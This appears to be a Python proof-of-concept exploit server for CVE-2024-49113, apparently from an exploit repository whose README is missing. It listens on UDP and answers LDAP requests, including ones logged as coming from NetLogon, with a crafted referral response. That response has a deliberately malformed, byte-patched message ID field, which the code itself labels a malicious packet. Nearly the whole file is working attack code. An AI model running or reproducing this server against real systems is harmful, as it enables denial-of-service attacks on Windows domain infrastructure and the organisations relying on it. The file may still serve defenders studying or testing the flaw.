README.md
README.md not found for CVE-2024-49113. The file may not exist in the repository.
import asyncio
from logger import logger
from ldaptor.protocols import pureldap
from ldaptor.protocols import pureber
# LDAP result code that signals a referral (value 10).
REFERRAL_RESULT_CODE = 10
class LDAPSearchResultDoneRefferal(pureldap.LDAPSearchResultDone):
    """SearchResultDone message whose wire form can include referral URLs."""

    def toWire(self):
        """
        Serialize this result to bytes.

        The sequence always holds the result code, matched DN and error
        message. Referral URLs are appended only when the result code is 10
        and a non-empty referral list is set; SASL credentials are appended
        when present.
        """
        fields = [
            pureber.BEREnumerated(self.resultCode),
            pureber.BEROctetString(self.matchedDN),
            pureber.BEROctetString(self.errorMessage),
        ]

        # 10 is the LDAP referral result code; 0xA3 is the context-specific
        # tag used for the referral sequence.
        if self.resultCode == 10 and self.referral:
            referral_urls = [pureber.BEROctetString(url) for url in self.referral]
            fields.append(pureber.BERSequence(referral_urls, tag=0xA3))

        if self.serverSaslCreds:
            sasl_creds = pureldap.LDAPBindResponse_serverSaslCreds(self.serverSaslCreds)
            fields.append(sasl_creds)

        envelope = pureber.BERSequence(fields, tag=self.tag)
        return envelope.toWire()
def get_malicious_ldap_packet(message_id: int, lm_referral: int=2) -> bytes:
    """
    Build an LDAP SearchResultDone response that carries a referral and a
    rewritten, 4-byte message ID field.

    The message is first serialized normally and then patched at the byte
    level. The resulting packet has the following structure:
      Result code: 10 (LDAP referral)
      Referral: ldap://referral.com (valid LDAP URL)
      Message ID: 4 bytes - lm_referral, two zero bytes, then the single
        message ID byte taken from the serialized message.

    Args:
        message_id: Message ID placed in the response envelope.
        lm_referral: Value written as the first of the four message ID bytes.

    Returns:
        The patched packet as bytes.

    Raises:
        ValueError: If lm_referral is 0, greater than 255, or odd.
    """
    # NOTE(review): a negative even lm_referral passes both checks below and
    # would only fail later in to_bytes() - confirm whether that is intended.
    if lm_referral == 0 or lm_referral > 255:
        raise ValueError("lm_referral must be between 1 and 255")
    if lm_referral & 1:
        raise ValueError("lm_referral must be an even number")
    ldap_search_result = LDAPSearchResultDoneRefferal(resultCode=REFERRAL_RESULT_CODE, referral=['ldap://referral.com'])
    ldap_response_message = pureldap.LDAPMessage(value=ldap_search_result, id=message_id)
    bytes_to_send = ldap_response_message.toWire()
    # Find the first INTEGER header with length 1 (0x02 0x01) and point at its
    # length byte.
    # NOTE(review): assumes this first match is the message ID and that the ID
    # was encoded in exactly one byte - confirm for larger message IDs.
    lm_referral_length_index = bytes_to_send.index(b"\x02\x01") + 1
    # The byte right after the length byte is the original one-byte message ID.
    message_id_byte = bytes_to_send[lm_referral_length_index + 1].to_bytes(length=1, byteorder='big')
    # Replace the 1-byte length/value pair with a 4-byte value, growing the
    # packet by three bytes.
    bytes_to_send = (
        bytes_to_send[:lm_referral_length_index] # Everything up to and including the INTEGER tag byte
        + b"\x04" # New length of the message ID (4 bytes)
        + lm_referral.to_bytes(length=1, byteorder='big') # encoded lm_referral
        + b"\x00\x00" # Padding
        + message_id_byte # Message ID
        + bytes_to_send[lm_referral_length_index + 2:] # Rest of the packet
    )
    # Three bytes were added, so the byte at index 1 is increased by 3.
    # NOTE(review): presumably byte 1 is the outer single-byte length; this
    # assumes the packet is short enough for that encoding - confirm.
    new_packet_length = bytes_to_send[1] + 3
    bytes_to_send = bytes_to_send[0:1] + new_packet_length.to_bytes(length=1, byteorder='big') + bytes_to_send[2:]
    return bytes_to_send
class LdapServerProtocol(asyncio.DatagramProtocol):
    """
    Datagram protocol that decodes each incoming LDAP message and replies to
    the sender with the packet built by get_malicious_ldap_packet().
    """

    def __init__(self):
        """Prepare the BER decoder context; the transport is set on connect."""
        super().__init__()

        # The fallback and inherit contexts are built as two separate objects.
        fallback_context = pureldap.LDAPBERDecoderContext(
            fallback=pureber.BERDecoderContext()
        )
        inherit_context = pureldap.LDAPBERDecoderContext(
            fallback=pureber.BERDecoderContext()
        )
        message_context = pureldap.LDAPBERDecoderContext_LDAPMessage(
            fallback=fallback_context,
            inherit=inherit_context,
        )
        self.berdecoder = pureldap.LDAPBERDecoderContext_TopLevel(
            inherit=message_context
        )
        self.transport = None

    def connection_made(self, transport: asyncio.DatagramTransport) -> None:
        """Store the transport so replies can be sent later."""
        self.transport = transport
        logger.info("NetLogon connected")

    def datagram_received(self, data: bytes, addr) -> None:
        """Decode the request and send the crafted response back to *addr*."""
        request, _ = pureber.berDecodeObject(self.berdecoder, data)
        logger.info(f"Received LDAP request from NetLogon {addr}")

        # The response reuses the message ID of the decoded request.
        response_packet = get_malicious_ldap_packet(request.id)
        logger.info(f"Sending malicious LDAP response packet to {addr}: {response_packet}")

        self.transport.sendto(response_packet, addr)

    def connection_refused(self, exc) -> None:
        """Log a refused connection."""
        logger.error(f"Connection refused: {exc}")

    def error_received(self, exc) -> None:
        """Log an error reported for the endpoint."""
        logger.error(f"Error received: {exc}")
async def run_exploit_server(listen_port: int):
    """
    Bind a UDP endpoint on all interfaces at *listen_port*, served by
    LdapServerProtocol, and wait indefinitely.

    The transport is closed and a shutdown message is logged when the wait
    ends for any reason.
    """
    bind_address = ('0.0.0.0', listen_port)
    event_loop = asyncio.get_running_loop()
    udp_transport, _ = await event_loop.create_datagram_endpoint(
        LdapServerProtocol,
        local_addr=bind_address,
    )

    try:
        # This future is never resolved, so the coroutine waits until it is
        # interrupted from outside.
        never_done = asyncio.Future()
        await never_done
    except KeyboardInterrupt:
        pass
    finally:
        udp_transport.close()
        logger.info("Server has been shut down.")